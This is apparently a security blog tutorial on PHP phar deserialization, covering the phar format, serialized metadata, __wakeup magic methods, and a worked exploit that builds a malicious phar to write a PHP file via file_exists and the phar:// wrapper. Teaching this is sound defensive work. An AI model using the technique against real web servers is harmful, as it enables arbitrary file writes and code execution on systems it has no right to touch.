Phar Deserialization Attacks Explained

In this blog post we will take a closer look at Phar Deserialization Attacks in PHP, including the phar file format and deserialization attacks in general. Since it was requested, I will add some short comments between sections about how I approached this research.


Reading about PHP vulnerabilities is always an adventure. Many of them are so counterintuitive and so hard for developers to prevent that you genuinely wonder what the language's designers were thinking when they made certain design choices.

I think, however, that a lot of the hate PHP gets is undeserved. Sure, older versions of PHP in particular were susceptible to a wide range of security flaws. Some convenient features, such as the infamous register_globals setting, which let users set script variables through POST or GET parameters, were application safety hazards. However, the truth of the matter is that these vulnerabilities were simply not widely known or exploited back then.

That, however, usually does not stop me from scratching my head when I stumble upon some of these design decisions, and one of the most striking examples is the Phar Deserialization Attack. It is the reason why a relatively harmless function call like the one below can prove to be fatal to your application's safety.

file_exists($_GET['file']);

But how can such a simple and presumably side-effect-free function call have such severe consequences? It's complicated, but we'll figure it out within this blog post.

The Phar File Format

It all starts with a file format called phar, short for PHP Archive. These archives are great because they allow you to bundle all the program code, assets and libraries that you may need for your application in one single file. If you think back to the days when we had no fancy CI/CD pipelines, you may come to the conclusion that this is kind of a cool way to make file transfers easier. Just bundle your application as a phar file, upload it to your server via FTP and you are all set.

Thankfully those days are over, but thinking about it, that whole phar concept may make you wonder: "How are these files actually stored? Is there any signature in case of corrupted data? Can we add our own metadata for processing by external tools?" All of these are valid questions. We'll answer them by looking at PHP's phar file documentation, which is luckily pretty verbose.

📚
Note: The documentation was one of the first places where I started my research. I roughly knew about the concept of phar deserialization, but not about all of the low level details.

It turns out that the components of a phar file are pretty straightforward. This is all you need:

A stub

The stub is some PHP code that is put at the beginning of a phar file. A required part of this code is a call to __HALT_COMPILER(). Why this is necessary will become clearer later. For now, just know that it is required.

A manifest

The manifest contains some important metadata. This includes the file sizes, the alias of the phar file and some other variables, notably a subsection with arbitrary user-defined metadata in a specific format. While that does not seem to have security implications at first glance, this is actually what makes phar files so dangerous. We'll talk about that in a second.

The actual file contents

As mentioned, you can store anything in a phar file. Static assets, PHP code, libraries, you name it. This is insanely convenient when you want to bundle an application, since everything you need is inside this single file.

An (optional) signature

This threw me off a bit. My first association when I read "signatures" was that they would prevent you from loading tampered files, yet what's mostly meant here are checksums that prevent a corrupted file from being loaded.

The phar file manifest

The real magic happens in the metadata though. Let's take a closer look at PHP's documentation to get an understanding of how it is structured.

[Figure: the phar file manifest layout, from the PHP documentation]

As you can see, there are many interesting properties, but for the experienced PHP exploiter there is one entry that sticks out. If you take a look at the last entry in the picture, you will notice that the file metadata is stored in PHP's serialize format, which brings us to one of PHP's most notoriously insecure functions: unserialize.

📚
This is the most important part of the vulnerability: the serialize/unserialize functions that are called internally. I was familiar with them before, but if you aren't, they may be overwhelming at first. That's why it's important to branch out your research when you are learning a new topic. Learning is not a straight line, and there are many related concepts that seem overwhelming at first. Try understanding them one step at a time and things get easier.

To check whether PHP's unserialize function is indeed involved, let's create a phar file and look at its content. Creating one is straightforward, and PHP provides a simple way of doing so.
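The original listing is not reproduced here, so the following is only a minimal sketch of what such a script might look like, using PHP's built-in Phar class. The file name test.phar and the Phar::canWrite() guard are my own choices for illustration.

```php
<?php
// Sketch: build a minimal phar archive with custom metadata.
// Writing phars requires phar.readonly=0, for example:
//   php -d phar.readonly=0 create.php
if (!Phar::canWrite()) {
    echo "phar.readonly is enabled, cannot create archives\n";
} else {
    @unlink('test.phar');                       // start from a clean slate
    $phar = new Phar('test.phar');              // the name is set on construction
    $phar->startBuffering();
    $phar->setMetadata(['random' => 'info']);   // stored serialized in the manifest
    $phar->setStub('<?php __HALT_COMPILER(); ?>');
    $phar->addFromString('_', '_');             // a file called "_" containing "_"
    $phar->stopBuffering();
}
```

The guard is there because phar.readonly is enabled by default and cannot be switched off from within a running script.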

As you can see, we are adding the most important data to create a minimal phar file. We set its name during initialization, set the metadata to an array with random info, create the stub with the __HALT_COMPILER call and add a simple file called _ with the content _. Note that creating phar files only works when the phar.readonly setting is 0 (zero).

Below is the hex representation of the created file.

Looking at that, some things become clear. First of all, we can see why the __HALT_COMPILER call is necessary. It allows you to treat the file as a valid PHP file, since the stub is placed right at the beginning. So if you call php test.phar, it will run the PHP code in the stub and then stop parsing where the internal manifest and file contents start.

The interesting bit is buried within all of the random-looking bytes: the user-controllable metadata. Our ["random"=>"info"] array was turned into this cryptic-looking string: a:1:{s:6:"random";s:4:"info";} which is our array, but in PHP's serialize format. Why and how is this dangerous?

📚
Again, I was already familiar with serialize, so it was not hard for me to spot within the metadata. If you are trying to learn about a new vulnerability, make sure you know what it looks like at a low level. Don't just copy & paste exploit code. Check what is actually passed over the wire and open it in a hex editor. You'll notice patterns as you gain experience.

The serialize format

This format is fascinating to me. It allows you to convert PHP's complex data structures into a simple string representation. To keep this post (at least somewhat) simple I won't go into the details of the format here, but you can easily find that information online.
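To get a rough feeling for the format anyway, here is a small sketch that serializes an array and an object. The Point class is a made-up example and not part of any real code base.

```php
<?php
// Sketch: what PHP's serialize format looks like for an array and an object.
class Point
{
    public $x = 1;
}

$array  = serialize(['random' => 'info']);
$object = serialize(new Point());

echo $array, "\n";   // a:1:{s:6:"random";s:4:"info";}
echo $object, "\n";  // O:5:"Point":1:{s:1:"x";i:1;}

// unserialize() turns the string back into the original structure.
$restored = unserialize($array);
```

Each value carries a type marker (a for array, s for string, i for integer, O for object) together with its length or element count.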

Usually when you are programming you know where your data is coming from and where it is going. Say you're programming a class for handling configuration files. You may have methods for reading and writing configuration options, for example, and maybe a function to store the configuration in and retrieve it from the file system. The assumption is that you have clear control over the content of the properties within this class. Nobody can change them without writing additional program code to do so. Deserialization, however, with the right combination of existing code, can break that assumption. Let's take a look at how.

The magic of methods 🪄

Assume we have a configuration class like the one below.
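The original listing is not reproduced here. What follows is a sketch reconstructed from the description in this post, so the class name Config, the property names path, defaults and data, and the default file location are all assumptions of mine.

```php
<?php
// Sketch of a configuration class with a __wakeup magic method.
class Config
{
    public $path;       // location of the config file
    public $defaults;   // written out when no config file exists yet
    public $data = [];

    public function __construct()
    {
        // Important variables are set here, but this does NOT run on unserialize().
        $this->path = sys_get_temp_dir() . '/app_config.json';
        $this->defaults = ['debug' => false];
    }

    public function get($key)
    {
        return $this->data[$key] ?? null;
    }

    public function set($key, $value)
    {
        $this->data[$key] = $value;
    }

    public function loadConfig()
    {
        if (file_exists($this->path)) {
            // Path 1: load and decode an existing file.
            $this->data = json_decode(file_get_contents($this->path), true) ?? [];
        } else {
            // Path 2: create a new file holding the default config as JSON.
            file_put_contents($this->path, json_encode($this->defaults));
            $this->data = $this->defaults;
        }
    }

    public function saveConfig()
    {
        file_put_contents($this->path, json_encode($this->data));
    }

    public function __wakeup()
    {
        // Called automatically after unserialize().
        $this->loadConfig();
    }
}
```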

This one is pretty straightforward. As in the written example above, there are methods to get and set data, and there are methods to read and store the configuration. One function, however, sticks out. There is a loadConfig function that you could call directly. But there is also this weird __wakeup function with the same functionality. So why would you need two methods that do the same thing?

Introducing: Magic Methods. Well, admittedly it's not the Disney World kind of magic, but they still have an interesting property: you don't have to call them explicitly. The way this works is simple. There are different magic methods, and each of them is called in a different kind of situation. A commonly encountered one is the constructor function at the beginning. This one is called when an object of the class is created using the new keyword.

The __wakeup function, on the other hand, is called upon deserialization of a serialized object of the class. So it will simply call the loadConfig method in our example. There is a problem, however. The __construct function is never called, yet some important variables are set in there. Where are these variables coming from now?

Well, we are turning the complete object, including the state it's in, into a string representation. That means that within the serialized string, there is a raw representation of every property of that object. Nothing prevents us from passing our own properties with arbitrary values inside a specially crafted serialized object.
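A tiny sketch makes this behaviour visible. The Demo class and the hand-written serialized string are made up for illustration.

```php
<?php
// Sketch: unserialize() skips __construct, calls __wakeup,
// and takes property values straight from the serialized string.
class Demo
{
    public $name;

    public function __construct()
    {
        $this->name = 'set by constructor';
        echo "__construct ran\n";
    }

    public function __wakeup()
    {
        echo "__wakeup ran, name = {$this->name}\n";
    }
}

// Hand-crafted input: the constructor never gets a chance to set $name.
$obj = unserialize('O:4:"Demo":1:{s:4:"name";s:8:"injected";}');
```

Running this only prints the __wakeup line, and the property holds the value that was supplied in the string.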

📚
Writing an exploit is not that difficult if you are the one who wrote the example. But in real-world cases I have encountered very complex chains of different classes, properties and methods that need to be combined to be vulnerable. Again, this gets easier the more you do it, and it is one of my favorite parts of this kind of research.

Writing an exploit

Looking at the code, we can think of an exploitation strategy. Within the loadConfig method there are two possible code paths. One of them loads and decodes an existing file, the other one creates a new file with the standard config in JSON format. Loading an existing file won't be very useful for us, but writing a file is! For our example we will just write it into the /tmp folder, but in a real-world scenario you would instead choose the webroot.

So how are we gonna do that? In this case we need to overwrite the default config with our payload and the config file path with a path to /tmp/owned.php. Also remember that the deserialization is triggered when we load a phar file and PHP tries to decode its metadata. So we need to create a phar file similarly to how we did it above, and set the metadata to a suitable object. Here is how I did it.
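The original listing is not reproduced here, so this is only a sketch under assumptions: it presumes the target class is called Config and keeps its file path and default configuration in public properties named path and defaults. These names, and the harmless payload string, are hypothetical.

```php
<?php
// Sketch: build pwn.phar with a crafted object as metadata.
// Stand-in class: only the class name and property names must match the target.
class Config
{
    public $path;
    public $defaults;
}

$payload = new Config();
$payload->path = '/tmp/owned.php';              // where the target will write
$payload->defaults = "<?php echo 'owned'; ?>";  // single quotes survive JSON encoding

// Writing phars requires phar.readonly=0 (php -d phar.readonly=0 build.php).
if (!Phar::canWrite()) {
    echo "phar.readonly is enabled, cannot create archives\n";
} else {
    @unlink('pwn.phar');
    $phar = new Phar('pwn.phar');
    $phar->startBuffering();
    $phar->setStub('<?php __HALT_COMPILER(); ?>');
    $phar->setMetadata($payload);               // serialized into the manifest
    $phar->addFromString('_', '_');
    $phar->stopBuffering();
}
```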

You can see the creation of the object and the fact that we set it as metadata.

This created a phar file called pwn.phar on our local machine. If we now upload it to the web server and trigger the deserialization with the help of the phar stream wrapper within our exposed file_exists function, like so: file_exists('phar:///path/pwn.phar'), we are able to create a PHP file in our chosen location. Since the code stores our payload in JSON encoding, we need to be careful with backslashes and double quotes. Note that this automatic deserialization applies to PHP versions before 8.0. Since PHP 8.0, phar metadata is only unserialized when getMetadata() is called explicitly.

Once we trigger the code we can confirm that we indeed created a file in the /tmp directory with the following content.
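The original output is not reproduced here. As a rough illustration of what ends up in the file and why quoting matters, here is a sketch that JSON-encodes two stand-in payload strings of my own choosing.

```php
<?php
// Sketch: how json_encode() treats a payload with single vs. double quotes.
$single = json_encode("<?php echo 'owned'; ?>");
$double = json_encode('<?php echo "owned"; ?>');

echo $single, "\n";  // "<?php echo 'owned'; ?>"
echo $double, "\n";  // "<?php echo \"owned\"; ?>"
```

The first result is still valid PHP between the surrounding JSON quotes, while the escaped double quotes in the second would break the PHP code once the file is executed.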

That's all there is to phar deserialization! To recap:

  • phar files are PHP archives
  • They can contain serialized data in their user-controlled metadata
  • We can set this to an arbitrary PHP object and supply any property values that we choose
  • In order to exploit them we need existing code whose property values we can overwrite in a way that's advantageous for us
  • Once we upload the phar file to the server, we can trigger it with the phar:// stream wrapper and an exposed function that accepts it

Thanks so much for reading. I've learned heaps during this research and I will likely keep these blog posts coming. If you've enjoyed the topic and don't want to miss the next one, please consider following me on Twitter: @ret2bed